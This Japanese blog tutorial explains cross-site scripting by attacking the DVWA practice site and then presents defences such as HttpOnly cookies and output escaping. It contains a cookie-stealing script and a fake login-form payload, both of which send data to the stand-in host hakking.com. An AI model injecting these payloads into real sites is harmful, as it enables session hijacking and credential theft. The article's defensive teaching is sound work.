Qiita Teams that are logged in
You are not logged in to any team

Log in to Qiita Team
Community
OrganizationEventAdvent CalendarQiitadon (β)
Service
Qiita JobsQiita ZineQiita Blog
36
Help us understand the problem. What is going on with this article?

More than 1 year has passed since last update.

@ichimura

ホワイトハッカーへの道 三歩目

今、改めてXSSを考える

前回「ホワイトハッカーへの道 二歩目」でファイルアップロードの脆弱性を見てきました。
今回はわかった気になっているXSS(Cross Site Scripting)について改めて理解を深め、対策を実施したいと思います。

XSS (Cross Site Scripting)

投稿型の口コミサイトや掲示板などに投稿フォームでHTMLやJavaScriptを埋め込み、セッションハイジャックや不正書き込み、ページ偽造やフィッシングなど、サービス運用側が予期しない挙動を発生させる攻撃です。

「百聞は一見に如かず」ということで、ローカル環境に脆弱性のあるやられサイトを立ち上げ、攻撃してみたいと思います。やられサイトの導入手順はこちらを参考にしてください。
DVWA(Damn Vulnerable Web Application)

下がセットアップ後のログイン画面になります。
スクリーンショット 2019-02-14 21.56.05.png
さて、レッツハッキング!

ハッキング

簡単な例をみていきましょう。やられサイトのセキュリティレベルをLowにしたうえ、投稿フォームにスクリプトを埋め込みます。
スクリーンショット 2019-02-14 22.03.31.png
投稿されたスクリプトが実行されてしました。
スクリーンショット 2019-02-14 21.51.58.png
これはとても一般的なXSSの例です。
これを応用しより悪意のある攻撃手法をご紹介いたします。

セッションハイジャック

XSSの中でもスクリプトでCookieに含まれるセッション情報(ログイン情報)を盗み、成りすましを行う攻撃です。投稿サイトに勝手に投稿されたり、ECサイトで勝手に見覚えのないものを買われたりといった被害が発生する可能性があります。下記のようなスクリプトを埋め込まれ対策していない場合、利用者のcookie情報は犯人に送信されてしまいます。

<script type='text/javascript'>
document.location='http://hakking.com/getCookie?cookie=' + document.cookie;
</script>

少し簡略化してcookieの中身を表示してみます。
スクリーンショット 2019-02-14 22.01.26.png
cookie情報も取得できてしまいました。cookie有効期間中にサイトにcookie情報を持って犯人が訪れたら...。
考えただけで怖いですね。
スクリーンショット 2019-02-14 22.02.22.png

ページ偽造やフィッシング

以下のようなスクリプトでログイン画面を偽造することで利用者のID/パスワードやクレジットカード番号を盗むことも可能です。

<script>
document.body.innerHTML = '<form method="POST" action="http://hakking.com/getIdPw">
<div>ID: <input type="text" name="id"></div>
<div>PW: <input type="password" name="password"></div>
<input type="submit" value="Login"></form>';
</script>

スクリーンショット 2019-02-14 22.35.57.png

偽造されたログイン画面が表示されました。こちらのPOST先は犯人のサイトに直結している場合にIDとパスワードを献上する形になります。
スクリーンショット 2019-02-14 22.36.56.png
※やられサイトDVWAのデフォルトmaxlengthとvarcharサイズを拡張しています。

対策

  • CookieにHttpOnly属性をつける
  • 文字列、属性値を出力する際はエスケープする
  • 属性値を出力する際に引用符で囲む
  • URLにjavascript:があるかチェックする

Cookie に HttpOnly 属性をつける

何よりCookieの値を盗まれないようにすることが重要です。HTTPのSet-CookieヘッダにHttpOnly属性を付与すると、Cookieの値はHTTP交換のみで使用され、JavaScriptからCookieの値を読み出せなくなります。

Set-Cookie: sid=ad415678gtetafet411gaafeqw; Secure; HttpOnly

これはchromeでデベロッパーツールよりcookieの値を確認したものです。
HTTPにチェックがある場合は対応されている状態です。
68747470733a2f2f71696974612d696d6167652d73746f72652e73332e616d617a6f6e6177732e636f6d2f302f3237323633352f32313461656639312d306630662d643930612d336433642d6639353731306464383363362e706e67.png

文字列、属性値を出力する際は適切にエスケープする

投稿データを表示するための変数$dataにスクリプトが含めている場合、スクリプトが実行されてしまいます。

<div>$data</div>
  ↓
<div><script>alert('ハッキング')</script></div>

タグを表示する場合はテキストや属性値に含まれるタグをエスケープします。

& → &amp;
< → &lt;
> → &gt;
" → &quot;
' → &#39;

Laravelフレームワークではview側で変数を表示する際に{{}}で括ります。

// htmlentities関数を通す
{{$text}}
// htmlentities関数を通さずに画面出力
{!! $text !!}

属性値を出力する際に引用符で囲む

$dataを引用符で囲まないと実行されてしまいます。

// こちらは実行できてしまう
<input type="button" value=$data>
  ↓
<input type="button" value=1 onclick=スクリプト>

// こちらは問題なし
<input type="button" value="$data">
  ↓
<input type="button" value="1 onclick=スクリプト">

URLにスクリプトが埋め込まれていないかチェックする

$dataが「javascript:スクリプト」の場合、悪意あるスクリプトが実行されてしまいます。

<a href="$data">...</a>
  ↓
<a href="javascript:スクリプト">...</a>

href、rel、srcなどの属性値に変数を指定する場合、httpまたはhttpsをチェックする必要があります。

まとめ

フレームワークを使い簡単にエスケープ対応ができてしまうと、
Webサービスを運営する側として、本来知らないといけない危険性に気づけないことがあります。
攻撃手法をしっかり理解し、ホワイトハッカーを目指しましょう。

36
Help us understand the problem. What is going on with this article?
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
36
Help us understand the problem. What is going on with this article?